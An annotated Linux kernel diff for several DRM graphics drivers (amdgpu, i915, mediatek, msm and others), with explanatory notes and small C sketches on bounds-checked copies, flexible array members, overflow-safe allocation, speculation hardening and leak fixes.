+ typedef struct _ATOM_PPLIB_STATE
+ {
+     UCHAR ucNonClockStateIndex;
+-    UCHAR ucClockStateIndices[1]; // variable-sized
++    UCHAR ucClockStateIndices[]; // variable-sized
+ } ATOM_PPLIB_STATE;
+ 
+ 
+@@ -473,7 +473,7 @@ typedef struct _ATOM_PPLIB_STATE_V2
+       /**
+       * Driver will read the first ucNumDPMLevels in this array
+       */
+-      UCHAR clockInfoIndex[1];
++      UCHAR clockInfoIndex[];
+ } ATOM_PPLIB_STATE_V2;
+ 
+ typedef struct _StateArray{
+diff --git a/drivers/gpu/drm/amd/pm/amdgpu_pm.c b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+index 0e78437c8389d..29f3d8431089e 100644
+--- a/drivers/gpu/drm/amd/pm/amdgpu_pm.c
++++ b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+@@ -758,7 +758,7 @@ static ssize_t amdgpu_set_pp_od_clk_voltage(struct device *dev,
+ 	if (adev->in_suspend && !adev->in_runpm)
+ 		return -EPERM;
+ 
+-	if (count > 127)
++	if (count > 127 || count == 0)
+ 		return -EINVAL;
+ 
+ 	if (*buf == 's')
+@@ -778,7 +778,8 @@ static ssize_t amdgpu_set_pp_od_clk_voltage(struct device *dev,
+ 	else
+ 		return -EINVAL;
+ 
+-	memcpy(buf_cpy, buf, count+1);
++	memcpy(buf_cpy, buf, count);
++	buf_cpy[count] = 0;
+ 
+ 	tmp_str = buf_cpy;
+ 
+@@ -795,6 +796,9 @@ static ssize_t amdgpu_set_pp_od_clk_voltage(struct device *dev,
+ 			return -EINVAL;
+ 		parameter_size++;
+ 
++		if (!tmp_str)
++			break;
++
+ 		while (isspace(*tmp_str))
+ 			tmp_str++;
+ 	}
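
Note: the amdgpu_set_pp_od_clk_voltage() hunks stop copying count + 1 bytes, which read one byte past the caller's data, and instead reject empty or oversized input, copy exactly count bytes, and terminate explicitly. The same bounded-copy pattern in a small userspace sketch (buffer size and names are illustrative):

#include <stdio.h>
#include <string.h>

/* Copy exactly 'count' bytes and terminate explicitly, rather than
 * copying count + 1 bytes and hoping the extra byte is a NUL. */
static int parse_cmd(const char *buf, size_t count)
{
	char buf_cpy[128];

	if (count == 0 || count > sizeof(buf_cpy) - 1)
		return -1;

	memcpy(buf_cpy, buf, count);
	buf_cpy[count] = '\0';

	printf("parsed: \"%s\"\n", buf_cpy);
	return 0;
}

int main(void)
{
	/* Deliberately not NUL-terminated, like a raw sysfs write. */
	const char raw[] = { 's', ' ', '0', ' ', '5', '0', '0' };

	return parse_cmd(raw, sizeof(raw));
}
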
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pptable_v1_0.h b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pptable_v1_0.h
+index b0ac4d121adca..e0e40b054c08b 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pptable_v1_0.h
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pptable_v1_0.h
+@@ -164,7 +164,7 @@ typedef struct _ATOM_Tonga_State {
+ typedef struct _ATOM_Tonga_State_Array {
+ 	UCHAR ucRevId;
+ 	UCHAR ucNumEntries;		/* Number of entries. */
+-	ATOM_Tonga_State entries[1];	/* Dynamically allocate entries. */
++	ATOM_Tonga_State entries[];	/* Dynamically allocate entries. */
+ } ATOM_Tonga_State_Array;
+ 
+ typedef struct _ATOM_Tonga_MCLK_Dependency_Record {
+@@ -179,7 +179,7 @@ typedef struct _ATOM_Tonga_MCLK_Dependency_Record {
+ typedef struct _ATOM_Tonga_MCLK_Dependency_Table {
+ 	UCHAR ucRevId;
+ 	UCHAR ucNumEntries; 										/* Number of entries. */
+-	ATOM_Tonga_MCLK_Dependency_Record entries[1];				/* Dynamically allocate entries. */
++	ATOM_Tonga_MCLK_Dependency_Record entries[];				/* Dynamically allocate entries. */
+ } ATOM_Tonga_MCLK_Dependency_Table;
+ 
+ typedef struct _ATOM_Tonga_SCLK_Dependency_Record {
+@@ -194,7 +194,7 @@ typedef struct _ATOM_Tonga_SCLK_Dependency_Record {
+ typedef struct _ATOM_Tonga_SCLK_Dependency_Table {
+ 	UCHAR ucRevId;
+ 	UCHAR ucNumEntries; 										/* Number of entries. */
+-	ATOM_Tonga_SCLK_Dependency_Record entries[1];				 /* Dynamically allocate entries. */
++	ATOM_Tonga_SCLK_Dependency_Record entries[];				 /* Dynamically allocate entries. */
+ } ATOM_Tonga_SCLK_Dependency_Table;
+ 
+ typedef struct _ATOM_Polaris_SCLK_Dependency_Record {
+@@ -210,7 +210,7 @@ typedef struct _ATOM_Polaris_SCLK_Dependency_Record {
+ typedef struct _ATOM_Polaris_SCLK_Dependency_Table {
+ 	UCHAR ucRevId;
+ 	UCHAR ucNumEntries;							/* Number of entries. */
+-	ATOM_Polaris_SCLK_Dependency_Record entries[1];				 /* Dynamically allocate entries. */
++	ATOM_Polaris_SCLK_Dependency_Record entries[];				 /* Dynamically allocate entries. */
+ } ATOM_Polaris_SCLK_Dependency_Table;
+ 
+ typedef struct _ATOM_Tonga_PCIE_Record {
+@@ -222,7 +222,7 @@ typedef struct _ATOM_Tonga_PCIE_Record {
+ typedef struct _ATOM_Tonga_PCIE_Table {
+ 	UCHAR ucRevId;
+ 	UCHAR ucNumEntries; 										/* Number of entries. */
+-	ATOM_Tonga_PCIE_Record entries[1];							/* Dynamically allocate entries. */
++	ATOM_Tonga_PCIE_Record entries[];							/* Dynamically allocate entries. */
+ } ATOM_Tonga_PCIE_Table;
+ 
+ typedef struct _ATOM_Polaris10_PCIE_Record {
+@@ -235,7 +235,7 @@ typedef struct _ATOM_Polaris10_PCIE_Record {
+ typedef struct _ATOM_Polaris10_PCIE_Table {
+ 	UCHAR ucRevId;
+ 	UCHAR ucNumEntries;                                         /* Number of entries. */
+-	ATOM_Polaris10_PCIE_Record entries[1];                      /* Dynamically allocate entries. */
++	ATOM_Polaris10_PCIE_Record entries[];                      /* Dynamically allocate entries. */
+ } ATOM_Polaris10_PCIE_Table;
+ 
+ 
+@@ -252,7 +252,7 @@ typedef struct _ATOM_Tonga_MM_Dependency_Record {
+ typedef struct _ATOM_Tonga_MM_Dependency_Table {
+ 	UCHAR ucRevId;
+ 	UCHAR ucNumEntries; 										/* Number of entries. */
+-	ATOM_Tonga_MM_Dependency_Record entries[1]; 			   /* Dynamically allocate entries. */
++	ATOM_Tonga_MM_Dependency_Record entries[]; 			   /* Dynamically allocate entries. */
+ } ATOM_Tonga_MM_Dependency_Table;
+ 
+ typedef struct _ATOM_Tonga_Voltage_Lookup_Record {
+@@ -265,7 +265,7 @@ typedef struct _ATOM_Tonga_Voltage_Lookup_Record {
+ typedef struct _ATOM_Tonga_Voltage_Lookup_Table {
+ 	UCHAR ucRevId;
+ 	UCHAR ucNumEntries; 										/* Number of entries. */
+-	ATOM_Tonga_Voltage_Lookup_Record entries[1];				/* Dynamically allocate entries. */
++	ATOM_Tonga_Voltage_Lookup_Record entries[];				/* Dynamically allocate entries. */
+ } ATOM_Tonga_Voltage_Lookup_Table;
+ 
+ typedef struct _ATOM_Tonga_Fan_Table {
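
Note: the [1] -> [] conversions in pptable.h and pptable_v1_0.h replace the old one-element-array idiom with C99 flexible array members, so the trailing array contributes nothing to sizeof and fortified bounds checks see the real extent. A standalone sketch of sizing and allocating such a structure (the layout here is invented, not one of the ATOM tables):

#include <stdio.h>
#include <stdlib.h>

struct state_array {
	unsigned char rev_id;
	unsigned char num_entries;
	unsigned short entries[];	/* flexible array member */
};

int main(void)
{
	unsigned char n = 4;
	struct state_array *a =
		malloc(sizeof(*a) + n * sizeof(a->entries[0]));
	unsigned char i;

	if (!a)
		return 1;
	a->num_entries = n;
	for (i = 0; i < n; i++)
		a->entries[i] = i;

	/* sizeof(*a) covers the header only, not the entries. */
	printf("header size = %zu\n", sizeof(*a));
	free(a);
	return 0;
}
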
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index a664a0a284784..47ff3694ffa57 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -1221,7 +1221,7 @@ static int smu_smc_hw_setup(struct smu_context *smu)
+ {
+ 	struct smu_feature *feature = &smu->smu_feature;
+ 	struct amdgpu_device *adev = smu->adev;
+-	uint32_t pcie_gen = 0, pcie_width = 0;
++	uint8_t pcie_gen = 0, pcie_width = 0;
+ 	uint64_t features_supported;
+ 	int ret = 0;
+ 
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h b/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
+index 1ab77a6cdb653..4174cb295dd0b 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
+@@ -844,7 +844,7 @@ struct pptable_funcs {
+ 	 * &pcie_gen_cap: Maximum allowed PCIe generation.
+ 	 * &pcie_width_cap: Maximum allowed PCIe width.
+ 	 */
+-	int (*update_pcie_parameters)(struct smu_context *smu, uint32_t pcie_gen_cap, uint32_t pcie_width_cap);
++	int (*update_pcie_parameters)(struct smu_context *smu, uint8_t pcie_gen_cap, uint8_t pcie_width_cap);
+ 
+ 	/**
+ 	 * @i2c_init: Initialize i2c.
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+index d6479a8088554..636b9579b96b0 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+@@ -298,8 +298,8 @@ int smu_v13_0_get_pptable_from_firmware(struct smu_context *smu,
+ 					uint32_t pptable_id);
+ 
+ int smu_v13_0_update_pcie_parameters(struct smu_context *smu,
+-				     uint32_t pcie_gen_cap,
+-				     uint32_t pcie_width_cap);
++				     uint8_t pcie_gen_cap,
++				     uint8_t pcie_width_cap);
+ 
+ #endif
+ #endif
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c
+index ca278280865fa..ed2112efc6c68 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c
+@@ -2368,8 +2368,8 @@ static int navi10_get_power_limit(struct smu_context *smu,
+ }
+ 
+ static int navi10_update_pcie_parameters(struct smu_context *smu,
+-				     uint32_t pcie_gen_cap,
+-				     uint32_t pcie_width_cap)
++					 uint8_t pcie_gen_cap,
++					 uint8_t pcie_width_cap)
+ {
+ 	struct smu_11_0_dpm_context *dpm_context = smu->smu_dpm.dpm_context;
+ 	PPTable_t *pptable = smu->smu_table.driver_pptable;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+index fbc4d706748b7..cfd41d56e9701 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+@@ -2084,14 +2084,14 @@ static int sienna_cichlid_display_disable_memory_clock_switch(struct smu_context
+ #define MAX(a, b)	((a) > (b) ? (a) : (b))
+ 
+ static int sienna_cichlid_update_pcie_parameters(struct smu_context *smu,
+-					 uint32_t pcie_gen_cap,
+-					 uint32_t pcie_width_cap)
++						 uint8_t pcie_gen_cap,
++						 uint8_t pcie_width_cap)
+ {
+ 	struct smu_11_0_dpm_context *dpm_context = smu->smu_dpm.dpm_context;
+ 	struct smu_11_0_pcie_table *pcie_table = &dpm_context->dpm_tables.pcie_table;
+ 	uint8_t *table_member1, *table_member2;
+-	uint32_t min_gen_speed, max_gen_speed;
+-	uint32_t min_lane_width, max_lane_width;
++	uint8_t min_gen_speed, max_gen_speed;
++	uint8_t min_lane_width, max_lane_width;
+ 	uint32_t smu_pcie_arg;
+ 	int ret, i;
+ 
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+index 3104d49379090..1b0fb93539ec4 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+@@ -2486,8 +2486,8 @@ int smu_v13_0_mode1_reset(struct smu_context *smu)
+ }
+ 
+ int smu_v13_0_update_pcie_parameters(struct smu_context *smu,
+-				     uint32_t pcie_gen_cap,
+-				     uint32_t pcie_width_cap)
++				     uint8_t pcie_gen_cap,
++				     uint8_t pcie_width_cap)
+ {
+ 	struct smu_13_0_dpm_context *dpm_context = smu->smu_dpm.dpm_context;
+ 	struct smu_13_0_pcie_table *pcie_table =
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+index 503e844baede2..af244def4801b 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+@@ -324,12 +324,12 @@ static int smu_v13_0_0_check_powerplay_table(struct smu_context *smu)
+ 	if (powerplay_table->platform_caps & SMU_13_0_0_PP_PLATFORM_CAP_HARDWAREDC)
+ 		smu->dc_controlled_by_gpio = true;
+ 
+-	if (powerplay_table->platform_caps & SMU_13_0_0_PP_PLATFORM_CAP_BACO ||
+-	    powerplay_table->platform_caps & SMU_13_0_0_PP_PLATFORM_CAP_MACO)
++	if (powerplay_table->platform_caps & SMU_13_0_0_PP_PLATFORM_CAP_BACO) {
+ 		smu_baco->platform_support = true;
+ 
+-	if (powerplay_table->platform_caps & SMU_13_0_0_PP_PLATFORM_CAP_MACO)
+-		smu_baco->maco_support = true;
++		if (powerplay_table->platform_caps & SMU_13_0_0_PP_PLATFORM_CAP_MACO)
++			smu_baco->maco_support = true;
++	}
+ 
+ 	table_context->thermal_controller_type =
+ 		powerplay_table->thermal_controller_type;
+@@ -1645,38 +1645,10 @@ static int smu_v13_0_0_set_power_profile_mode(struct smu_context *smu,
+ 		}
+ 	}
+ 
+-	if (smu->power_profile_mode == PP_SMC_POWER_PROFILE_COMPUTE &&
+-		(((smu->adev->pdev->device == 0x744C) && (smu->adev->pdev->revision == 0xC8)) ||
+-		((smu->adev->pdev->device == 0x744C) && (smu->adev->pdev->revision == 0xCC)))) {
+-		ret = smu_cmn_update_table(smu,
+-					   SMU_TABLE_ACTIVITY_MONITOR_COEFF,
+-					   WORKLOAD_PPLIB_COMPUTE_BIT,
+-					   (void *)(&activity_monitor_external),
+-					   false);
+-		if (ret) {
+-			dev_err(smu->adev->dev, "[%s] Failed to get activity monitor!", __func__);
+-			return ret;
+-		}
+-
+-		ret = smu_cmn_update_table(smu,
+-					   SMU_TABLE_ACTIVITY_MONITOR_COEFF,
+-					   WORKLOAD_PPLIB_CUSTOM_BIT,
+-					   (void *)(&activity_monitor_external),
+-					   true);
+-		if (ret) {
+-			dev_err(smu->adev->dev, "[%s] Failed to set activity monitor!", __func__);
+-			return ret;
+-		}
+-
+-		workload_type = smu_cmn_to_asic_specific_index(smu,
+-						       CMN2ASIC_MAPPING_WORKLOAD,
+-						       PP_SMC_POWER_PROFILE_CUSTOM);
+-	} else {
+-		/* conv PP_SMC_POWER_PROFILE* to WORKLOAD_PPLIB_*_BIT */
+-		workload_type = smu_cmn_to_asic_specific_index(smu,
++	/* conv PP_SMC_POWER_PROFILE* to WORKLOAD_PPLIB_*_BIT */
++	workload_type = smu_cmn_to_asic_specific_index(smu,
+ 						       CMN2ASIC_MAPPING_WORKLOAD,
+ 						       smu->power_profile_mode);
+-	}
+ 
+ 	if (workload_type < 0)
+ 		return -EINVAL;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+index bf24850027dab..bd065f1c699f5 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+@@ -326,12 +326,13 @@ static int smu_v13_0_7_check_powerplay_table(struct smu_context *smu)
+ 	if (powerplay_table->platform_caps & SMU_13_0_7_PP_PLATFORM_CAP_HARDWAREDC)
+ 		smu->dc_controlled_by_gpio = true;
+ 
+-	if (powerplay_table->platform_caps & SMU_13_0_7_PP_PLATFORM_CAP_BACO ||
+-	    powerplay_table->platform_caps & SMU_13_0_7_PP_PLATFORM_CAP_MACO)
++	if (powerplay_table->platform_caps & SMU_13_0_7_PP_PLATFORM_CAP_BACO) {
+ 		smu_baco->platform_support = true;
+ 
+-	if (smu_baco->platform_support && (BoardTable->HsrEnabled || BoardTable->VddqOffEnabled))
+-		smu_baco->maco_support = true;
++		if ((powerplay_table->platform_caps & SMU_13_0_7_PP_PLATFORM_CAP_MACO)
++					&& (BoardTable->HsrEnabled || BoardTable->VddqOffEnabled))
++			smu_baco->maco_support = true;
++	}
+ 
+ 	table_context->thermal_controller_type =
+ 		powerplay_table->thermal_controller_type;
+diff --git a/drivers/gpu/drm/arm/display/komeda/komeda_pipeline_state.c b/drivers/gpu/drm/arm/display/komeda/komeda_pipeline_state.c
+index 3276a3e82c628..916f2c36bf2f7 100644
+--- a/drivers/gpu/drm/arm/display/komeda/komeda_pipeline_state.c
++++ b/drivers/gpu/drm/arm/display/komeda/komeda_pipeline_state.c
+@@ -1223,7 +1223,7 @@ int komeda_build_display_data_flow(struct komeda_crtc *kcrtc,
+ 	return 0;
+ }
+ 
+-static void
++static int
+ komeda_pipeline_unbound_components(struct komeda_pipeline *pipe,
+ 				   struct komeda_pipeline_state *new)
+ {
+@@ -1243,8 +1243,12 @@ komeda_pipeline_unbound_components(struct komeda_pipeline *pipe,
+ 		c = komeda_pipeline_get_component(pipe, id);
+ 		c_st = komeda_component_get_state_and_set_user(c,
+ 				drm_st, NULL, new->crtc);
++		if (PTR_ERR(c_st) == -EDEADLK)
++			return -EDEADLK;
+ 		WARN_ON(IS_ERR(c_st));
+ 	}
++
++	return 0;
+ }
+ 
+ /* release unclaimed pipeline resource */
+@@ -1266,9 +1270,8 @@ int komeda_release_unclaimed_resources(struct komeda_pipeline *pipe,
+ 	if (WARN_ON(IS_ERR_OR_NULL(st)))
+ 		return -EINVAL;
+ 
+-	komeda_pipeline_unbound_components(pipe, st);
++	return komeda_pipeline_unbound_components(pipe, st);
+ 
+-	return 0;
+ }
+ 
+ /* Since standalone disabled components must be disabled separately and in the
+diff --git a/drivers/gpu/drm/drm_lease.c b/drivers/gpu/drm/drm_lease.c
+index d72c2fac0ff1a..b7362356e5448 100644
+--- a/drivers/gpu/drm/drm_lease.c
++++ b/drivers/gpu/drm/drm_lease.c
+@@ -507,8 +507,8 @@ int drm_mode_create_lease_ioctl(struct drm_device *dev,
+ 	/* Handle leased objects, if any */
+ 	idr_init(&leases);
+ 	if (object_count != 0) {
+-		object_ids = memdup_user(u64_to_user_ptr(cl->object_ids),
+-					 array_size(object_count, sizeof(__u32)));
++		object_ids = memdup_array_user(u64_to_user_ptr(cl->object_ids),
++					       object_count, sizeof(__u32));
+ 		if (IS_ERR(object_ids)) {
+ 			ret = PTR_ERR(object_ids);
+ 			idr_destroy(&leases);
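
Note: drm_mode_create_lease_ioctl() above moves to memdup_array_user(), which folds the overflow check on object_count * sizeof(__u32) into the copy helper itself. A rough userspace approximation of what that guard does (the real kernel helper additionally copies from user space and returns an ERR_PTR on failure):

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static void *memdup_array(const void *src, size_t n, size_t size)
{
	void *p;

	if (size && n > SIZE_MAX / size)
		return NULL;	/* n * size would overflow */

	p = malloc(n * size);
	if (p)
		memcpy(p, src, n * size);
	return p;
}

int main(void)
{
	uint32_t ids[] = { 1, 2, 3 };
	uint32_t *copy = memdup_array(ids, 3, sizeof(*ids));

	if (!copy)
		return 1;
	printf("copied id[2] = %u\n", copy[2]);
	free(copy);
	return 0;
}
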
+diff --git a/drivers/gpu/drm/gma500/psb_drv.h b/drivers/gpu/drm/gma500/psb_drv.h
+index ae544b69fc475..52f9ed3c24b8e 100644
+--- a/drivers/gpu/drm/gma500/psb_drv.h
++++ b/drivers/gpu/drm/gma500/psb_drv.h
+@@ -426,6 +426,7 @@ struct drm_psb_private {
+ 	uint32_t pipestat[PSB_NUM_PIPE];
+ 
+ 	spinlock_t irqmask_lock;
++	bool irq_enabled;
+ 
+ 	/* Power */
+ 	bool pm_initialized;
+diff --git a/drivers/gpu/drm/gma500/psb_irq.c b/drivers/gpu/drm/gma500/psb_irq.c
+index d421031462df6..ab2d49dab35a0 100644
+--- a/drivers/gpu/drm/gma500/psb_irq.c
++++ b/drivers/gpu/drm/gma500/psb_irq.c
+@@ -338,6 +338,8 @@ int gma_irq_install(struct drm_device *dev)
+ 
+ 	gma_irq_postinstall(dev);
+ 
++	dev_priv->irq_enabled = true;
++
+ 	return 0;
+ }
+ 
+@@ -348,6 +350,9 @@ void gma_irq_uninstall(struct drm_device *dev)
+ 	unsigned long irqflags;
+ 	unsigned int i;
+ 
++	if (!dev_priv->irq_enabled)
++		return;
++
+ 	spin_lock_irqsave(&dev_priv->irqmask_lock, irqflags);
+ 
+ 	if (dev_priv->ops->hotplug_enable)
+diff --git a/drivers/gpu/drm/i915/display/intel_cdclk.c b/drivers/gpu/drm/i915/display/intel_cdclk.c
+index 92925f0f72396..25dcdde5feb69 100644
+--- a/drivers/gpu/drm/i915/display/intel_cdclk.c
++++ b/drivers/gpu/drm/i915/display/intel_cdclk.c
+@@ -2368,6 +2368,18 @@ static int intel_compute_min_cdclk(struct intel_cdclk_state *cdclk_state)
+ 	for_each_pipe(dev_priv, pipe)
+ 		min_cdclk = max(cdclk_state->min_cdclk[pipe], min_cdclk);
+ 
++	/*
++	 * Avoid glk_force_audio_cdclk() causing excessive screen
++	 * blinking when multiple pipes are active by making sure
++	 * CDCLK frequency is always high enough for audio. With a
++	 * single active pipe we can always change CDCLK frequency
++	 * by changing the cd2x divider (see glk_cdclk_table[]) and
++	 * thus a full modeset won't be needed then.
++	 */
++	if (IS_GEMINILAKE(dev_priv) && cdclk_state->active_pipes &&
++	    !is_power_of_2(cdclk_state->active_pipes))
++		min_cdclk = max(2 * 96000, min_cdclk);
++
+ 	if (min_cdclk > dev_priv->display.cdclk.max_cdclk_freq) {
+ 		drm_dbg_kms(&dev_priv->drm,
+ 			    "required cdclk (%d kHz) exceeds max (%d kHz)\n",
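
Note: active_pipes in the hunk above is a bitmask, so "non-zero and not a power of two" is a compact test for "two or more pipes active". The bit trick in isolation:

#include <stdbool.h>
#include <stdio.h>

static bool is_power_of_2(unsigned long n)
{
	return n != 0 && (n & (n - 1)) == 0;	/* exactly one bit set */
}

int main(void)
{
	unsigned long one_pipe = 1ul << 2;		/* pipe C only */
	unsigned long two_pipes = (1ul << 0) | (1ul << 2);

	printf("one pipe  multiple? %d\n", one_pipe && !is_power_of_2(one_pipe));
	printf("two pipes multiple? %d\n", two_pipes && !is_power_of_2(two_pipes));
	return 0;
}
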
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_context.c b/drivers/gpu/drm/i915/gem/i915_gem_context.c
+index 598028870124d..5e1b11db74816 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_context.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_context.c
+@@ -844,6 +844,7 @@ static int set_proto_ctx_sseu(struct drm_i915_file_private *fpriv,
+ 		if (idx >= pc->num_user_engines)
+ 			return -EINVAL;
+ 
++		idx = array_index_nospec(idx, pc->num_user_engines);
+ 		pe = &pc->user_engines[idx];
+ 
+ 		/* Only render engine supports RPCS configuration. */
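The one-line i915 change above is Spectre-v1 hardening: the idx bounds check alone can be bypassed under branch misprediction, so array_index_nospec() clamps the value before it feeds an array dereference. The generic pattern, sketched with hypothetical types:

    #include <linux/nospec.h>

    /* Check, then clamp: even under speculation idx stays below
     * nr_entries, so no out-of-bounds line is pulled into the cache. */
    static int lookup(const struct my_table *t, unsigned long idx)
    {
        if (idx >= t->nr_entries)
            return -EINVAL;

        idx = array_index_nospec(idx, t->nr_entries);
        return t->entries[idx];
    }
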
+diff --git a/drivers/gpu/drm/i915/i915_perf.c b/drivers/gpu/drm/i915/i915_perf.c
+index 3ce49c118b83f..2d4f09813a15b 100644
+--- a/drivers/gpu/drm/i915/i915_perf.c
++++ b/drivers/gpu/drm/i915/i915_perf.c
+@@ -3809,11 +3809,8 @@ int i915_perf_open_ioctl(struct drm_device *dev, void *data,
+ 	u32 known_open_flags;
+ 	int ret;
+ 
+-	if (!perf->i915) {
+-		drm_dbg(&perf->i915->drm,
+-			"i915 perf interface not available for this system\n");
++	if (!perf->i915)
+ 		return -ENOTSUPP;
+-	}
+ 
+ 	known_open_flags = I915_PERF_FLAG_FD_CLOEXEC |
+ 			   I915_PERF_FLAG_FD_NONBLOCK |
+@@ -4140,11 +4137,8 @@ int i915_perf_add_config_ioctl(struct drm_device *dev, void *data,
+ 	struct i915_oa_reg *regs;
+ 	int err, id;
+ 
+-	if (!perf->i915) {
+-		drm_dbg(&perf->i915->drm,
+-			"i915 perf interface not available for this system\n");
++	if (!perf->i915)
+ 		return -ENOTSUPP;
+-	}
+ 
+ 	if (!perf->metrics_kobj) {
+ 		drm_dbg(&perf->i915->drm,
+@@ -4306,11 +4300,8 @@ int i915_perf_remove_config_ioctl(struct drm_device *dev, void *data,
+ 	struct i915_oa_config *oa_config;
+ 	int ret;
+ 
+-	if (!perf->i915) {
+-		drm_dbg(&perf->i915->drm,
+-			"i915 perf interface not available for this system\n");
++	if (!perf->i915)
+ 		return -ENOTSUPP;
+-	}
+ 
+ 	if (i915_perf_stream_paranoid && !perfmon_capable()) {
+ 		drm_dbg(&perf->i915->drm,
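The drm_dbg() calls removed from i915_perf were themselves the bug: each dereferenced perf->i915->drm inside the very branch that had just established perf->i915 is NULL:

    /* The deleted anti-pattern, for reference: */
    if (!perf->i915) {
        drm_dbg(&perf->i915->drm, "...\n");   /* NULL deref in the !ptr branch */
        return -ENOTSUPP;
    }
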
+diff --git a/drivers/gpu/drm/mediatek/mtk_dp.c b/drivers/gpu/drm/mediatek/mtk_dp.c
+index 395a190274cfb..2c850b6d945bc 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dp.c
++++ b/drivers/gpu/drm/mediatek/mtk_dp.c
+@@ -1983,7 +1983,6 @@ static struct edid *mtk_dp_get_edid(struct drm_bridge *bridge,
+ 	bool enabled = mtk_dp->enabled;
+ 	struct edid *new_edid = NULL;
+ 	struct mtk_dp_audio_cfg *audio_caps = &mtk_dp->info.audio_cur_cfg;
+-	struct cea_sad *sads;
+ 
+ 	if (!enabled) {
+ 		drm_bridge_chain_pre_enable(bridge);
+@@ -2006,11 +2005,16 @@ static struct edid *mtk_dp_get_edid(struct drm_bridge *bridge,
+ 	 */
+ 	if (mtk_dp_parse_capabilities(mtk_dp)) {
+ 		drm_err(mtk_dp->drm_dev, "Can't parse capabilities\n");
++		kfree(new_edid);
+ 		new_edid = NULL;
+ 	}
+ 
+ 	if (new_edid) {
++		struct cea_sad *sads;
++
+ 		audio_caps->sad_count = drm_edid_to_sad(new_edid, &sads);
++		kfree(sads);
++
+ 		audio_caps->detect_monitor = drm_detect_monitor_audio(new_edid);
+ 	}
+ 
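Two leaks are closed in mtk_dp_get_edid(): the EDID itself on the capability-parse failure path, and the short-audio-descriptor array, because drm_edid_to_sad() allocates *sads with kmalloc() and hands ownership to the caller. A usage sketch; the kernel implementation initializes *sads to NULL before parsing, which is why the unconditional kfree() in the hunk above is safe:

    struct cea_sad *sads;
    int count = drm_edid_to_sad(edid, &sads);   /* allocates; caller frees */

    if (count > 0)
        audio_caps->sad_count = count;          /* only the count is kept  */
    kfree(sads);
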
+diff --git a/drivers/gpu/drm/msm/dp/dp_panel.c b/drivers/gpu/drm/msm/dp/dp_panel.c
+index 5149cebc93f61..d38086650fcf7 100644
+--- a/drivers/gpu/drm/msm/dp/dp_panel.c
++++ b/drivers/gpu/drm/msm/dp/dp_panel.c
+@@ -266,26 +266,9 @@ int dp_panel_get_modes(struct dp_panel *dp_panel,
+ 
+ static u8 dp_panel_get_edid_checksum(struct edid *edid)
+ {
+-	struct edid *last_block;
+-	u8 *raw_edid;
+-	bool is_edid_corrupt = false;
++	edid += edid->extensions;
+ 
+-	if (!edid) {
+-		DRM_ERROR("invalid edid input\n");
+-		return 0;
+-	}
+-
+-	raw_edid = (u8 *)edid;
+-	raw_edid += (edid->extensions * EDID_LENGTH);
+-	last_block = (struct edid *)raw_edid;
+-
+-	/* block type extension */
+-	drm_edid_block_valid(raw_edid, 1, false, &is_edid_corrupt);
+-	if (!is_edid_corrupt)
+-		return last_block->checksum;
+-
+-	DRM_ERROR("Invalid block, no checksum\n");
+-	return 0;
++	return edid->checksum;
+ }
+ 
+ void dp_panel_handle_sink_request(struct dp_panel *dp_panel)
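The rewritten msm checksum helper relies on struct edid being exactly one 128-byte EDID block: pointer arithmetic in units of the struct steps block by block, edid->extensions counts the blocks following the base one, and each block ends in its own checksum byte. The same computation in array form:

    /* edid += edid->extensions lands on the last extension block;
     * the struct's final byte is that block's checksum. */
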